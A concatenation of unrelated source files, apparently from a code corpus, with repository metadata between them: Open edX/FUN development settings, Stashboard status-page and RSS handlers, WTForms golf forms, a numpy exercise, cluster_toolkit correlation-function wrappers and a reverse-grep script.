LTI_XBLOCK_CONFIGURATIONS = config( "LTI_XBLOCK_CONFIGURATIONS", default=[ { "display_name": "LTI consumer", "pattern": ".*", "hidden_fields": [ "ask_to_send_email", "ask_to_send_username", "new_window", ], "defaults": { "ask_to_send_email": True, "ask_to_send_username": True, "launch_target": "new_window", }, } ], formatter=json.loads, ) LTI_XBLOCK_SECRETS = config("LTI_XBLOCK_SECRETS", default={}, formatter=json.loads) ################################ FUN stuff ################################ SITE_VARIANT = "lms" # Environment's name displayed in FUN's backoffice ENVIRONMENT = config("ENVIRONMENT", default="no set") BASE_ROOT = path("/edx/app/edxapp/") # Fun-apps configuration INSTALLED_APPS += ( "backoffice", "bootstrapform", "ckeditor", "course_dashboard", "course_pages", "courses_api", "courses", "easy_thumbnails", "edx_gea", "forum_contributors", "fun_api", "fun_certificates", "fun_instructor", "fun", "funsite", "haystack", "masquerade", "newsfeed", "password_container", "payment_api", "payment", "pure_pagination", "raven.contrib.django.raven_compat", "rest_framework.authtoken", "teachers", "universities", "videoproviders", ) ROOT_URLCONF = "fun.lms.urls" # Related Richie platform url PLATFORM_RICHIE_URL = config("PLATFORM_RICHIE_URL", default=None) # Haystack configuration (default is minimal working configuration) HAYSTACK_CONNECTIONS = config( "HAYSTACK_CONNECTIONS", default={ "default": {"ENGINE": "courses.search_indexes.ConfigurableElasticSearchEngine"} }, formatter=json.loads, ) CKEDITOR_UPLOAD_PATH = "./" CKEDITOR_CONFIGS = { "default": { "toolbar": [ [ "Undo", "Redo", "-", "Bold", "Italic", "Underline", "-", "Link", "Unlink", "Anchor", "-", "Format", "-", "SpellChecker", "Scayt", "-", "Maximize", ], [ "HorizontalRule", "-", "Table", "-", "BulletedList", "NumberedList", "-", "Cut", "Copy", "Paste", "PasteText", "PasteFromWord", "-", "SpecialChar", "-", "Source", ], ], "toolbarCanCollapse": False, "entities": False, "width": 955, "uiColor": "#9AB8F3", }, "news": { # Redefine path where the news images/files are uploaded. This would # better be done at runtime with the 'reverse' function, but # unfortunately there is no way around defining this in the settings # file. "filebrowserUploadUrl": "/news/ckeditor/upload/", "filebrowserBrowseUrl": "/news/ckeditor/browse/", "toolbar_Full": [ [ "Styles", "Format", "Bold", "Italic", "Underline", "Strike", "SpellChecker", "Undo", "Redo", ], ["Image", "Flash", "Table", "HorizontalRule"], ["NumberedList", "BulletedList", "Blockquote", "TextColor", "BGColor"], ["Smiley", "SpecialChar"], ["Source"], ], }, } # ### FUN-APPS SETTINGS ### # This is dist-packages path where all fun-apps are FUN_BASE_ROOT = path(os.path.dirname(pkgutil.get_loader("funsite").filename)) SHARED_ROOT = DATA_DIR / "shared" # Add FUN applications templates directories to MAKO template finder before edX's ones MAKO_TEMPLATES["main"] = [ # overrides template in edx-platform/lms/templates FUN_BASE_ROOT / "funsite/templates/lms", FUN_BASE_ROOT / "funsite/templates", FUN_BASE_ROOT / "course_pages/templates", FUN_BASE_ROOT / "payment/templates", FUN_BASE_ROOT / "course_dashboard/templates", FUN_BASE_ROOT / "newsfeed/templates", FUN_BASE_ROOT / "fun_certificates/templates", ] + MAKO_TEMPLATES["main"] # JS static override DEFAULT_TEMPLATE_ENGINE["DIRS"].append(FUN_BASE_ROOT / "funsite/templates/lms") FUN_SMALL_LOGO_RELATIVE_PATH = "funsite/images/logos/funmooc173.png" FUN_BIG_LOGO_RELATIVE_PATH = "funsite/images/logos/funmoocfp.png" FAVICON_PATH = "fun/images/favicon.ico" # Locale paths # Here we rewrite LOCAL_PATHS to give precedence to our applications above edx-platform's ones, # then we add xblocks which provide translations as there is no native mechanism to handle this # See Xblock i18n: http://www.libremente.eu/2017/12/06/edx-translation/ LOCALIZED_FUN_APPS = [ "backoffice", "course_dashboard", "course_pages", "courses", "fun_api", "fun_certificates", "funsite", "newsfeed", "payment", "universities", "videoproviders", ] LOCALE_PATHS = [FUN_BASE_ROOT / app / "locale" for app in LOCALIZED_FUN_APPS] LOCALE_PATHS.append(REPO_ROOT / "conf/locale") # edx-platform locales LOCALE_PATHS.append(path(pkgutil.get_loader("proctor_exam").filename) / "locale") # -- Certificates CERTIFICATES_DIRECTORY_NAME = "attestations" FUN_LOGO_PATH = FUN_BASE_ROOT / "funsite/static" / FUN_BIG_LOGO_RELATIVE_PATH FUN_ATTESTATION_LOGO_PATH = ( FUN_BASE_ROOT / "funsite/static" / "funsite/images/logos/funmoocattest.png" ) STUDENT_NAME_FOR_TEST_CERTIFICATE = "Test User" # Videofront subtitles cache CACHES["video_subtitles"] = { "BACKEND": "django.core.cache.backends.filebased.FileBasedCache", "KEY_PREFIX": "video_subtitles", "LOCATION": DATA_DIR / "video_subtitles_cache", } # Course image thumbnails FUN_THUMBNAIL_OPTIONS = { "small": {"size": (270, 152), "crop": "smart"}, "big": {"size": (337, 191), "crop": "smart"}, "about": {"size": (730, 412), "crop": "scale"}, "facebook": { "size": (600, 315), "crop": "smart", }, # https://developers.facebook.com/docs/sharing/best-practices } THUMBNAIL_PRESERVE_EXTENSIONS = True THUMBNAIL_EXTENSION = "png" ##### ORA2 ###### ORA2_FILEUPLOAD_BACKEND = "swift" ORA2_SWIFT_KEY = config("ORA2_SWIFT_KEY", default="") ORA2_SWIFT_URL = config("ORA2_SWIFT_URL", default="") # Prefix for uploads of example-based assessment AI classifiers # This can be used to separate uploads for different environments ORA2_FILE_PREFIX = config("ORA2_FILE_PREFIX", default=ORA2_FILE_PREFIX) # Profile image upload PROFILE_IMAGE_BACKEND = { "class": "storages.backends.overwrite.OverwriteStorage", "options": { "location": os.path.join(MEDIA_ROOT, "profile-images/"), "base_url": os.path.join(MEDIA_URL, "profile-images/"), }, } ENABLE_ADWAYS_FOR_COURSES = config( "ENABLE_ADWAYS_FOR_COURSES", default=[], formatter=json.loads ) # Add our v3 CSS and JS files to assets compilation pipeline to make them available in courseware. # On FUN v3 frontend, which do not use edX's templates, those files are loaded # by funsite/templates/funsite/parts/base.html and css/lms-main.css PIPELINE_CSS["style-vendor"]["source_filenames"].append("fun/css/cookie-banner.css") PIPELINE_CSS["style-vendor"]["source_filenames"].append("funsite/css/header.css") PIPELINE_CSS["style-vendor"]["source_filenames"].append("funsite/css/footer.css") # can't find any common group for group in ["base_vendor", "main_vendor"]: PIPELINE_JS[group]["source_filenames"].append("funsite/js/header.js") PIPELINE_JS[group]["source_filenames"].append("fun/js/cookie-banner.js") # Glowbl GLOWBL_LTI_ENDPOINT = config( "GLOWBL_LTI_ENDPOINT", default="http://ltiapps.net/test/tp.php" ) GLOWBL_LTI_KEY = config("GLOWBL_LTI_KEY", default="jisc.ac.uk") GLOWBL_LTI_SECRET = config("GLOWBL_LTI_SECRET", default="secret") GLOWBL_LTI_ID = config("GLOWBL_LTI_ID", default="testtoolconsumer") GLOWBL_LAUNCH_URL = config( "GLOWBL_LAUNCH_URL", default="http://ltiapps.net/test/tp.php" ) GLOWBL_COLL_OPT = config("GLOWBL_COLL_OPT", default="FunMoocJdR") DEFAULT_TEMPLATE_ENGINE["DIRS"].append(FUN_BASE_ROOT / "funsite/templates/lms") DEFAULT_TEMPLATE_ENGINE["OPTIONS"]["context_processors"].append( "fun.context_processor.fun_settings" ) TEMPLATES = [DEFAULT_TEMPLATE_ENGINE] # This force Edx Studio to use our own video provider Xblock on default button FUN_DEFAULT_VIDEO_PLAYER = "libcast_xblock" MIDDLEWARE_CLASSES += ( "fun.middleware.LegalAcceptance", "backoffice.middleware.PathLimitedMasqueradeMiddleware", ) class LazyChoicesSorter(object): def __init__(self, choices): self.choices = choices def __iter__(self): for choice in sorted(self.choices, key=lambda peer: peer[1]): yield choice # These are the allowed subtitle languages, we have the same list on Videofront server # We remove 2 deprecated chinese language codes which do not exist on Django 1.10 VideoFront SUBTITLE_SUPPORTED_LANGUAGES = LazyChoicesSorter( (code, ugettext_lazy(lang)) for code, lang in global_settings.LANGUAGES if code not in ("zh-cn", "zh-tw") ) ANONYMIZATION_KEY = config("ANONYMIZATION_KEY", default="") RAVEN_CONFIG = config("RAVEN_CONFIG", default={"dsn": ""}, formatter=json.loads) ELASTICSEARCH_INDEX_SETTINGS = { "settings": { "analysis": { "filter": { "elision": { "type": "elision", "articles": ["l", "m", "t", "qu", "n", "s", "j", "d"], } }, "analyzer": { "custom_french_analyzer": { "tokenizer": "letter", "filter": [ "asciifolding", "lowercase", "french_stem", "elision", "stop", "word_delimiter", ], } }, } } } FUN_MKTG_URLS = config("FUN_MKTG_URLS", default={}, formatter=json.loads) # Default visibility of student's profile to other students ACCOUNT_VISIBILITY_CONFIGURATION["default_visibility"] = "private" # A user is verified if he has an approved SoftwareSecurePhotoVerification entry # this setting will create a dummy SoftwareSecurePhotoVerification for user in # paybox success callback view. A this point, we think it's better to create a # dummy one than to remove verifying process in edX FUN_ECOMMERCE_DEBUG_NO_NOTIFICATION = config( "FUN_ECOMMERCE_DEBUG_NO_NOTIFICATION", default=False, formatter=bool ) ECOMMERCE_NOTIFICATION_URL = config("ECOMMERCE_NOTIFICATION_URL", default=None) PAYMENT_ADMIN = "<EMAIL>" # List of pattern definitions to automatically add verified users to a cohort # If value is [] this feature is disabled # Otherwise this setting is a list of # tuple values (r"<course id regex>", "<cohort name>"). # e.g: if you want to enable this feature for a particular course you can set # this setting to # [ # (r"<course id>", "cohort name"), # ] VERIFIED_COHORTS = config("VERIFIED_COHORTS", default=[]) # Force Edx to use `libcast_xblock` as default video player # in the studio (big green button) and if any xblock is called `video` XBLOCK_SELECT_FUNCTION = prefer_fun_video if "sentry" in LOGGING.get("handlers"): LOGGING["handlers"]["sentry"]["environment"] = "development" # Configure gelf handler to listen on graylog server LOGGING["loggers"][""]["handlers"].append("gelf") LOGGING["loggers"]["tracking"]["handlers"].append("gelf") LOGGING["handlers"]["gelf"] = { "level": "DEBUG", "class": "djehouty.libgelf.handlers.GELFTCPSocketHandler", "host": "graylog", "port": 12201, "null_character": True, } DEBUG = True REQUIRE_DEBUG = True EMAIL_BACKEND = config( "EMAIL_BACKEND", default="django.core.mail.backends.console.EmailBackend" ) PIPELINE_ENABLED = False STATICFILES_STORAGE = "openedx.core.storage.DevelopmentStorage" ALLOWED_HOSTS = ["*"] FEATURES["AUTOMATIC_AUTH_FOR_TESTING"] = True # ORA2 fileupload ORA2_FILEUPLOAD_BACKEND = "filesystem" ORA2_FILEUPLOAD_ROOT = os.path.join(SHARED_ROOT, "openassessment_submissions") ORA2_FILEUPLOAD_CACHE_ROOT = os.path.join( SHARED_ROOT, "openassessment_submissions_cache" ) AUTHENTICATION_BACKENDS = config( "AUTHENTICATION_BACKENDS", default=["django.contrib.auth.backends.ModelBackend"], formatter=json.loads )
1.867188
2
stashboard/handlers/site.py
kelnos/stashboard
1
16742
# The MIT License # # Copyright (c) 2008 <NAME> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to # deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. __author__ = '<NAME>' import datetime import calendar import logging import os import re import string import urllib import urlparse from google.appengine.api import memcache from google.appengine.api import users from google.appengine.ext import webapp from google.appengine.ext import db from datetime import date, timedelta from django.conf import settings from django.template.loader import render_to_string from django.utils import simplejson as json from time import mktime from models import List, Status, Service, Event, Profile import xml.etree.ElementTree as et from utils import authorized from wsgiref.handlers import format_date_time def default_template_data(): data = { "title": settings.SITE_NAME, "report_url": settings.REPORT_URL, "twitter_handle": settings.TWITTER_HANDLE, } user = users.get_current_user() if user is not None: data["user"] = user data["logout_url"] = users.create_logout_url("/") data["admin"] = users.is_current_user_admin() return data def get_past_days(num): date = datetime.date.today() dates = [] for i in range(1, num + 1): dates.append(date - datetime.timedelta(days=i)) return dates class BaseHandler(webapp.RequestHandler): def render(self, template_values, filename): self.response.out.write(render_to_string(filename, template_values)) def retrieve(self, key): """ Helper for loading data from memcache """ all_pages = memcache.get("__all_pages__") if all_pages is None: all_pages = {} item = memcache.get(key) if all_pages.has_key(key) else None if item is not None: return item else: item = self.data() if not memcache.set(key, item): logging.error("Memcache set failed on %s" % key) else: all_pages[key] = 1 if not memcache.set("__all_pages__", all_pages): logging.error("Memcache set failed on __all_pages__") return item def not_found(self): self.error(404) self.render(default_template_data(), "404.html") class NotFoundHandler(BaseHandler): def get(self): self.error(404) self.render(default_template_data(), "404.html") class UnauthorizedHandler(webapp.RequestHandler): def get(self): self.error(403) self.render(default_template_data(), "404.html") class RootHandler(BaseHandler): def data(self): services = [] default_status = Status.get_default() for service in Service.all().order("list").order("name").fetch(100): event = service.current_event() if event is not None: status = event.status else: status = default_status today = date.today() + timedelta(days=1) current, = service.history(1, default_status, start=today) has_issues = (current["information"] and status.key() == default_status.key()) service_dict = { "slug": service.slug, "name": service.name, "url": service.url(), "status": status, "has_issues": has_issues, "history": service.history(5, default_status), } services.append(service_dict) return { "days": get_past_days(5), "statuses": Status.all().fetch(100), "services": services, } def get(self): td = default_template_data() td.update(self.retrieve("frontpage")) #td.update(self.data()) self.render(td, 'index.html') class ListHandler(BaseHandler): list = None def data(self): services = [] default_status = Status.get_default() query = Service.all().filter("list =", self.list).order("name") for service in query.fetch(100): event = service.current_event() if event is not None: status = event.status else: status = default_status today = date.today() + timedelta(days=1) current, = service.history(1, default_status, start=today) has_issues = (current["information"] and status.key() == default_status.key()) service_dict = { "slug": service.slug, "name": service.name, "url": service.url(), "status": status, "has_issues": has_issues, "history": service.history(5, default_status), } services.append(service_dict) return { "days": get_past_days(5), "statuses": Status.all().fetch(100), "services": services, } def get(self, list_slug): self.list = List.get_by_slug(list_slug) if self.list is None: self.not_found() return td = default_template_data() td.update(self.retrieve("list"+list_slug)) #td.update(self.data()) self.render(td, 'index.html') class ListListHandler(BaseHandler): lists = [] statuses = [] def data(self): services = [] default_status = Status.get_default() lists = [] for list in self.lists: l = List.get_by_slug(list) if l is not None: lists.append(l) for service in Service.all().filter("list IN", lists).order("name").fetch(100): event = service.current_event() if event is not None: status = event.status else: status = default_status if len(self.statuses) and not status.slug in self.statuses: continue today = date.today() + timedelta(days=1) current, = service.history(1, default_status, start=today) has_issues = (current["information"] and status.key() == default_status.key()) service_dict = { "slug": service.slug, "name": service.name, "url": service.url(), "status": status, "has_issues": has_issues, "history": service.history(5, default_status), } services.append(service_dict) return { "days": get_past_days(5), "statuses": Status.all().fetch(100), "services": services, } def get(self): self.lists = self.request.get_all('filter') self.lists.sort() self.statuses = self.request.get_all('status') self.statuses.sort() td = default_template_data() td.update(self.retrieve("list"+"_".join(self.statuses)+"_".join(self.lists))) #td.update(self.data()) self.render(td, 'index.html') class ListSummaryHandler(BaseHandler): def data(self): lists = {} default_status = Status.get_default() for service in Service.all().order("list").fetch(100): event = service.current_event() if event is not None: status = event.status else: status = default_status if service.list and not lists.has_key(service.list.slug) or \ lists[service.list.slug]["status"].name < status.name: lists[service.list.slug] = {"list": service.list, "status": status} return { "lists": lists.items() } def get(self): td = default_template_data() td.update(self.retrieve("summary")) #td.update(self.data()) self.render(td, 'summary.html') class ServiceHandler(BaseHandler): def get(self, service_slug, year=None, month=None, day=None): service = Service.get_by_slug(service_slug) if not service: self.not_found() return try: if day: start_date = date(int(year), int(month), int(day)) end_date = start_date + timedelta(days=1) elif month: start_date = date(int(year), int(month), 1) days = calendar.monthrange(start_date.year, start_date.month)[1] end_date = start_date + timedelta(days=days) elif year: start_date = date(int(year), 1, 1) end_date = start_date + timedelta(days=365) else: start_date = None end_date = None except ValueError: self.not_found(404) return events = service.events if start_date and end_date: events.filter('start >= ', start_date).filter('start <', end_date) td = default_template_data() td["service"] = service td["events"] = events.order("-start").fetch(500) self.render(td, 'service.html') class BaseDocumentationHandler(BaseHandler): def get(self): td = default_template_data() td["selected"] = "overview" self.render(td, 'publicdoc/index.html') class DocumentationHandler(BaseHandler): pages = [ "events", "services", "service-lists", "status-images", "statuses", "status-images", ] def get(self, page): td = default_template_data() if page not in self.pages: self.render({}, '404.html') return td["selected"] = page self.render(td, "publicdoc/%s.html" % page) class CredentialsRedirectHandler(BaseHandler): def get(self): self.redirect("/admin/credentials") class RSSHandler(BaseHandler): """ Feed of the last settings.RSS_NUM_EVENTS_TO_FETCH events """ def get(self): self.response.headers['Content-Type'] = "application/rss+xml; charset=utf-8" host = self.request.headers.get('host', 'nohost') base_url = self.request.scheme + "://" + host events = [] query = Event.all().order("-start") # Filter query by requested services, if specified in the 'service' URL parameter. service_list = [] for service_arg in self.request.get_all('services'): service_list.extend(service_arg.split(',')) service_list = map(lambda serv_slug: Service.get_by_slug(serv_slug), service_list) # filter out any non-existent services service_list = filter(lambda service: not service is None, service_list) service_string = 'all services' if len(service_list) > 0: query.filter('service IN', service_list) if len(service_list) == 1: service_string = 'the %s service' % service_list[0].name elif len(service_list) == 2: service_string = 'the %s and %s services' % (service_list[0].name, service_list[1].name) else: service_string = 'the %s, and %s services' % (', '.join([service.name for service in service_list[:-1]]), service_list[-1].name) # Create the root 'rss' element rss_xml = et.Element('rss') rss_xml.set('version', '2.0') # Create the channel element and its metadata elements channel = et.SubElement(rss_xml, 'channel') title = et.SubElement(channel, 'title') title.text = '%s Service Events' % settings.SITE_NAME description = et.SubElement(channel, 'description') description.text = 'This feed shows the last %d events on %s on %s.' % (settings.RSS_NUM_EVENTS_TO_FETCH, service_string, settings.SITE_NAME) link = et.SubElement(channel, 'link') link.text = base_url # Create each of the feed events. item_subelements = { 'title': lambda(event): '[%s - %s] %s' % (event.service.name, event.status.name, unicode(event.message)), 'description': lambda(event): '%s' % unicode(event.message), 'link': lambda(event): '%s/services/%s' % (base_url, event.service.slug), 'category': lambda(event): event.service.name, 'pubDate': lambda(event): format_date_time(mktime(event.start.timetuple())), 'guid': lambda(event): '%s/api/v1/services/%s/events/%s' % (base_url, event.service.slug, unicode(event.key())) } for event in query.fetch(settings.RSS_NUM_EVENTS_TO_FETCH): item = et.SubElement(channel, 'item') for tag, text_func in item_subelements.iteritems(): subelement = et.SubElement(item, tag) subelement.text = text_func(event) self.response.out.write('<?xml version="1.0" encoding="UTF-8"?>\n') self.response.out.write(et.tostring(rss_xml))
1.671875
2
bga/forms.py
KarmaPoliceT2/bga
0
16743
<reponame>KarmaPoliceT2/bga<gh_stars>0 from wtforms import Form, StringField, PasswordField, DecimalField, IntegerField, SelectField, validators from wtforms.fields.html5 import DateField def strip_filter(x): return x.strip() if x else None class RegistrationForm(Form): username = StringField('Username', [validators.Length( min=1, max=255)], filters=[strip_filter]) password = PasswordField('Password', [validators.Length(min=3, max=255)]) class CreateCourseForm(Form): coursename = StringField( 'Course Name', [validators.Length(min=1, max=255)], filters=[strip_filter]) courselocation = StringField( 'Course Location', [validators.Length(min=1, max=255)], filters=[strip_filter]) rating = DecimalField('Rating', [validators.NumberRange( min=50, max=150, message="Must Be Between 50-150")], places=2) slope = IntegerField('Slope', [validators.NumberRange( min=55, max=155, message="Must Be Between 55-155")]) courseimage = StringField('Course Image URL', [validators.Length( min=1, max=255), validators.URL(message="Must Be a URL")], filters=[strip_filter]) class CreateScoreForm(Form): course = SelectField('Course Name', choices=[('oops', 'oops')]) rounddate = DateField('Round Date', format='%Y-%m-%d') score = IntegerField('Round Score') attest = SelectField('Attesting Golfer', choices=[('oops', 'oops')])
2.359375
2
ejercicios_python/Clase05/practica5-9.py
hcgalvan/UNSAM-Python-programming
0
16744
# -*- coding: utf-8 -*- """ Created on Wed Sep 15 08:32:03 2021 @author: User """ import numpy as np import matplotlib.pyplot as plt a = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]) print(a) print(a[0]) print(a.ndim) #te dice la cantidad de ejes (o dimensiones) del arreglo print(a.shape) #Te va a dar una tupla de enteros que indican la cantidad de elementos en cada eje. print(a.size) #%% vec_fila = a[np.newaxis, :] print(vec_fila.shape, a.shape) #%% print(a.sum()) print(a.min()) print(a.max()) #%% print(a) print(a.max(axis=1)) print(a.max(axis=0)) #%% print(np.random.random(3))
3.375
3
cluster_toolkit/xi.py
jhod0/cluster_toolkit
0
16745
<filename>cluster_toolkit/xi.py """Correlation functions for matter and halos. """ import cluster_toolkit from cluster_toolkit import _ArrayWrapper, _handle_gsl_error import numpy as np def xi_nfw_at_r(r, M, c, Omega_m, delta=200): """NFW halo profile correlation function. Args: r (float or array like): 3d distances from halo center in Mpc/h comoving M (float): Mass in Msun/h c (float): Concentration Omega_m (float): Omega_matter, matter fraction of the density delta (int; optional): Overdensity, default is 200 Returns: float or array like: NFW halo profile. """ r = _ArrayWrapper(r, 'r') xi = _ArrayWrapper.zeros_like(r) cluster_toolkit._lib.calc_xi_nfw(r.cast(), len(r), M, c, delta, Omega_m, xi.cast()) return xi.finish() def xi_einasto_at_r(r, M, conc, alpha, om, delta=200, rhos=-1.): """Einasto halo profile. Args: r (float or array like): 3d distances from halo center in Mpc/h comoving M (float): Mass in Msun/h; not used if rhos is specified conc (float): Concentration alpha (float): Profile exponent om (float): Omega_matter, matter fraction of the density delta (int): Overdensity, default is 200 rhos (float): Scale density in Msun h^2/Mpc^3 comoving; optional Returns: float or array like: Einasto halo profile. """ r = _ArrayWrapper(r, 'r') xi = _ArrayWrapper.zeros_like(r) cluster_toolkit._lib.calc_xi_einasto(r.cast(), len(r), M, rhos, conc, alpha, delta, om, xi.cast()) return xi.finish() def xi_mm_at_r(r, k, P, N=500, step=0.005, exact=False): """Matter-matter correlation function. Args: r (float or array like): 3d distances from halo center in Mpc/h comoving k (array like): Wavenumbers of power spectrum in h/Mpc comoving P (array like): Matter power spectrum in (Mpc/h)^3 comoving N (int; optional): Quadrature step count, default is 500 step (float; optional): Quadrature step size, default is 5e-3 exact (boolean): Use the slow, exact calculation; default is False Returns: float or array like: Matter-matter correlation function """ r = _ArrayWrapper(r, 'r') k = _ArrayWrapper(k, allow_multidim=True) P = _ArrayWrapper(P, allow_multidim=True) xi = _ArrayWrapper.zeros_like(r) if not exact: rc = cluster_toolkit._lib.calc_xi_mm(r.cast(), len(r), k.cast(), P.cast(), len(k), xi.cast(), N, step) _handle_gsl_error(rc, xi_mm_at_r) else: if r.arr.max() > 1e3: raise Exception("max(r) cannot be >1e3 for numerical stability.") rc = cluster_toolkit._lib.calc_xi_mm_exact(r.cast(), len(r), k.cast(), P.cast(), len(k), xi.cast()) _handle_gsl_error(rc, xi_mm_at_r) return xi.finish() def xi_2halo(bias, xi_mm): """2-halo term in halo-matter correlation function Args: bias (float): Halo bias xi_mm (float or array like): Matter-matter correlation function Returns: float or array like: 2-halo term in halo-matter correlation function """ xi_mm = _ArrayWrapper(xi_mm, allow_multidim=True) xi = _ArrayWrapper.zeros_like(xi_mm) cluster_toolkit._lib.calc_xi_2halo(len(xi_mm), bias, xi_mm.cast(), xi.cast()) return xi.finish() def xi_hm(xi_1halo, xi_2halo, combination="max"): """Halo-matter correlation function Note: at the moment you can combine the 1-halo and 2-halo terms by either taking the max of the two or the sum of the two. The 'combination' field must be set to either 'max' (default) or 'sum'. Args: xi_1halo (float or array like): 1-halo term xi_2halo (float or array like, same size as xi_1halo): 2-halo term combination (string; optional): specifies how the 1-halo and 2-halo terms are combined, default is 'max' which takes the max of the two Returns: float or array like: Halo-matter correlation function """ if combination == "max": switch = 0 elif combination == 'sum': switch = 1 else: raise Exception("Combinations other than maximum not implemented yet") xi_1halo = _ArrayWrapper(xi_1halo, allow_multidim=True) xi_2halo = _ArrayWrapper(xi_2halo, allow_multidim=True) xi = _ArrayWrapper.zeros_like(xi_1halo) cluster_toolkit._lib.calc_xi_hm(len(xi_1halo), xi_1halo.cast(), xi_2halo.cast(), xi.cast(), switch) return xi.finish() def xi_DK(r, M, conc, be, se, k, P, om, delta=200, rhos=-1., alpha=-1., beta=-1., gamma=-1.): """Diemer-Kravtsov 2014 profile. Args: r (float or array like): radii in Mpc/h comoving M (float): mass in Msun/h conc (float): Einasto concentration be (float): DK transition parameter se (float): DK transition parameter k (array like): wavenumbers in h/Mpc P (array like): matter power spectrum in [Mpc/h]^3 Omega_m (float): matter density fraction delta (float): overdensity of matter. Optional, default is 200 rhos (float): Einasto density. Optional, default is compute from the mass alpha (float): Einasto parameter. Optional, default is computed from peak height beta (float): DK 2-halo parameter. Optional, default is 4 gamma (float): DK 2-halo parameter. Optional, default is 8 Returns: float or array like: DK profile evaluated at the input radii """ r = _ArrayWrapper(r, 'r') k = _ArrayWrapper(k, allow_multidim=True) P = _ArrayWrapper(P, allow_multidim=True) xi = _ArrayWrapper.zeros_like(r) cluster_toolkit._lib.calc_xi_DK(r.cast(), len(r), M, rhos, conc, be, se, alpha, beta, gamma, delta, k.cast(), P.cast(), len(k), om, xi.cast()) return xi.finish() def xi_DK_appendix1(r, M, conc, be, se, k, P, om, bias, xi_mm, delta=200, rhos=-1., alpha=-1., beta=-1., gamma=-1.): """Diemer-Kravtsov 2014 profile, first form from the appendix, eq. A3. Args: r (float or array like): radii in Mpc/h comoving M (float): mass in Msun/h conc (float): Einasto concentration be (float): DK transition parameter se (float): DK transition parameter k (array like): wavenumbers in h/Mpc P (array like): matter power spectrum in [Mpc/h]^3 Omega_m (float): matter density fraction bias (float): halo bias xi_mm (float or array like): matter correlation function at r delta (float): overdensity of matter. Optional, default is 200 rhos (float): Einasto density. Optional, default is compute from the mass alpha (float): Einasto parameter. Optional, default is computed from peak height beta (float): DK 2-halo parameter. Optional, default is 4 gamma (float): DK 2-halo parameter. Optional, default is 8 Returns: float or array like: DK profile evaluated at the input radii """ r = _ArrayWrapper(r, 'r') k = _ArrayWrapper(k, allow_multidim=True) P = _ArrayWrapper(P, allow_multidim=True) xi_mm = _ArrayWrapper(xi_mm, allow_multidim=True) xi = np.zeros_like(r) cluster_toolkit._lib.calc_xi_DK_app1(r.cast(), len(r), M, rhos, conc, be, se, alpha, beta, gamma, delta, k.cast(), P.cast(), len(k), om, bias, xi_mm.cast(), xi.cast()) return xi.finish() def xi_DK_appendix2(r, M, conc, be, se, k, P, om, bias, xi_mm, delta=200, rhos=-1., alpha=-1., beta=-1., gamma=-1.): """Diemer-Kravtsov 2014 profile, second form from the appendix, eq. A4. Args: r (float or array like): radii in Mpc/h comoving M (float): mass in Msun/h conc (float): Einasto concentration be (float): DK transition parameter se (float): DK transition parameter k (array like): wavenumbers in h/Mpc P (array like): matter power spectrum in [Mpc/h]^3 Omega_m (float): matter density fraction bias (float): halo bias xi_mm (float or array like): matter correlation function at r delta (float): overdensity of matter. Optional, default is 200 rhos (float): Einasto density. Optional, default is compute from the mass alpha (float): Einasto parameter. Optional, default is computed from peak height beta (float): DK 2-halo parameter. Optional, default is 4 gamma (float): DK 2-halo parameter. Optional, default is 8 Returns: float or array like: DK profile evaluated at the input radii """ r = _ArrayWrapper(r, 'r') k = _ArrayWrapper(k) P = _ArrayWrapper(P) xi_mm = _ArrayWrapper(xi_mm) xi = _ArrayWrapper.zeros_like(r) cluster_toolkit._lib.calc_xi_DK_app2(r.cast(), len(r), M, rhos, conc, be, se, alpha, beta, gamma, delta, k.cast(), P.cast(), len(k), om, bias, xi_mm.cast(), xi.cast()) return xi.finish()
2.40625
2
Tools/scripts/rgrep.py
ystk/debian-python3.1
1
16746
<reponame>ystk/debian-python3.1 #! /usr/bin/env python """Reverse grep. Usage: rgrep [-i] pattern file """ import sys import re import getopt def main(): bufsize = 64*1024 reflags = 0 opts, args = getopt.getopt(sys.argv[1:], "i") for o, a in opts: if o == '-i': reflags = reflags | re.IGNORECASE if len(args) < 2: usage("not enough arguments") if len(args) > 2: usage("exactly one file argument required") pattern, filename = args try: prog = re.compile(pattern, reflags) except re.error as msg: usage("error in regular expression: %s" % str(msg)) try: f = open(filename) except IOError as msg: usage("can't open %s: %s" % (repr(filename), str(msg)), 1) f.seek(0, 2) pos = f.tell() leftover = None while pos > 0: size = min(pos, bufsize) pos = pos - size f.seek(pos) buffer = f.read(size) lines = buffer.split("\n") del buffer if leftover is None: if not lines[-1]: del lines[-1] else: lines[-1] = lines[-1] + leftover if pos > 0: leftover = lines[0] del lines[0] else: leftover = None lines.reverse() for line in lines: if prog.search(line): print(line) def usage(msg, code=2): sys.stdout = sys.stderr print(msg) print(__doc__) sys.exit(code) if __name__ == '__main__': main()
2.953125
3
licel_format_parser/main.py
IFAEControl/lidar-cli
0
16747
